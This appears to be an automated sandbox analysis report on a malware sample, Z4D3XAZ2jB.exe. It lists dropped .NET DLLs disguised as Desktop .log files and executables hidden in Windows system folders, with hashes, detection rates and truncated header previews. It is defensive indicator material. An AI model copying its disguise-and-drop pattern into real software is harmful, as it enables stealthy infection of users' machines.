                                                                                                                              SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\hREwAhMk.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):39936
                                                                                                                              Entropy (8bit):5.629584586954759
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                                              MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                                              SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                                              SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                                              SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\hdUdukKE.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):32768
                                                                                                                              Entropy (8bit):5.645950918301459
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                              MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                              SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                              SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                              SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\klRmPCEz.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):39936
                                                                                                                              Entropy (8bit):5.629584586954759
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                                              MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                                              SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                                              SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                                              SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\lyXnXruh.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):32768
                                                                                                                              Entropy (8bit):5.645950918301459
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                              MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                              SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                              SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                              SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\oPsvdwHZ.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):70144
                                                                                                                              Entropy (8bit):5.909536568846014
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                                              MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                                              SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                                              SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                                              SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\qmplAoJV.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):36352
                                                                                                                              Entropy (8bit):5.668291349855899
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                                              MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                                              SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                                              SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                                              SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\quZEfXkb.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):40448
                                                                                                                              Entropy (8bit):5.7028690200758465
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                                                              MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                                                              SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                                                              SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                                                              SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\rAXMkKSS.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):33280
                                                                                                                              Entropy (8bit):5.634433516692816
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                                              MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                                              SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                                              SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                                              SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\rMnteNPl.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):38912
                                                                                                                              Entropy (8bit):5.679286635687991
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                              MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                              SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                              SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                              SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\tWJuefum.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):69632
                                                                                                                              Entropy (8bit):5.932541123129161
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                              MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                              SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                              SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                              SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                              C:\Users\user\Desktop\uUlCzfJh.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):33280
                                                                                                                              Entropy (8bit):5.634433516692816
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                                              MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                                              SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                                              SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                                              SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\wNAllcuf.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):40448
                                                                                                                              Entropy (8bit):5.7028690200758465
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                                                              MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                                                              SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                                                              SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                                                              SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\wySLBGmi.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):126976
                                                                                                                              Entropy (8bit):6.057993947082715
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                              MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                              SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                              SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                                              SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\xbtTyUdE.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):39936
                                                                                                                              Entropy (8bit):5.660491370279985
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                                              MD5:240E98D38E0B679F055470167D247022
                                                                                                                              SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                                              SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                                              SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\yKbtGcJa.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):34816
                                                                                                                              Entropy (8bit):5.636032516496583
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                              MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                              SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                              SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                                                              SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3163910
                                                                                                                              Entropy (8bit):7.992391848855575
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:49152:ILfoFX5SJqMr60Ag4ErCKLYy3XxggNblydYuwVHlizQ/U4oiUT6JgcBKMzWpwneR:8AkqMrv4ErCKbfl/uwVHlNlzQUWWeWC
                                                                                                                              MD5:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              SHA1:9571472C5D0899E517E1C1F84C6C05DFD2ABB2B5
                                                                                                                              SHA-256:9C2AD3D80258AF2508987D952DD5A7744BEDBDD16260E4F76412EA6696774285
                                                                                                                              SHA-512:439D108D086E6231513A7D40E01EA9C8D1B0D9948C9412F2828F694D94CCFA64E98D8A6956464CCCB632BB072AAE4E3C00154733BC3AF97A11CD7A57F0B0FB10
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                              Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@..p....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                                                                                                              C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe:Zone.Identifier

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):26
                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                              Malicious:false
                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                              C:\Windows\BitLockerDiscoveryVolumeContents\d766a8fd310fca

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with very long lines (472), with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):472
                                                                                                                              Entropy (8bit):5.85928305820468
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:cZyrLxd9exp3iTKponyksBwQmqQeBEno0SUEGVgRsCN+22vmvQ:cZyrLxd9SyFGwdsEnkGYsSI
                                                                                                                              MD5:BC697A7BA014AD919BDDD7AF509B7DDB
                                                                                                                              SHA1:7D485E9A0B90F41165EE172EDBB4060FB53BF365
                                                                                                                              SHA-256:2726F766572B0CD819EDDB64C8D8D8FACA3D326E671626C4A031463D8CB37BFD
                                                                                                                              SHA-512:FF377BCD8A6B90E5E9D13620ADD96110473F4C1C0558744B8161680E1BC5EBDC4BC9CC9BBEA55039F0C39856FF301B7968480FE04A26E9F22892C60B96E76401
                                                                                                                              Malicious:false
                                                                                                                              Preview:A0aKONhc4KwYcl8trXuUeS2UWBbfB6iB00amnnnW18fpSbRoQlrlYu8r7FxNwCa7mvimLWFDuYdfwMC5twPaP6nF2soizZjyiiDh3pd3fn19Rc4uD2d9x9rpHcucrhOUyo7OIeBETV5mEnyZx3e76kBj0YZb5AM7ZhKnfqmi0ZpbDFkdnUoyDRXOmYXuFkJSJ7NhdL3HR6Gg4jfuy5xkVY4HJ6AHS2dQQWSG2DAcahgGL1UD2m5Jwi6vDFXhLwyZdzQhQZ1u5VJy1x6Sl6Op6TdrahDxqcQosHnVkwwduLOaYH3PIE5OhIcJWjHtWEEcEfGtKlszKv5uFDSSnxolhCGjpd9ApDHqHvV3BKFhWFEwNrESQzFiac5CYhEqmrKGnOnTrZQcsHPb8UV7Zquz7jQo0TedGY5o57I8Evl1imzSNdDELHQ67UIE89cY4wWUMlfALW2nF2RVu7bXPaS8H8ql

                                                                                                                              C:\Windows\GameBarPresenceWriter\c5b4cb5e9653cc

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):280
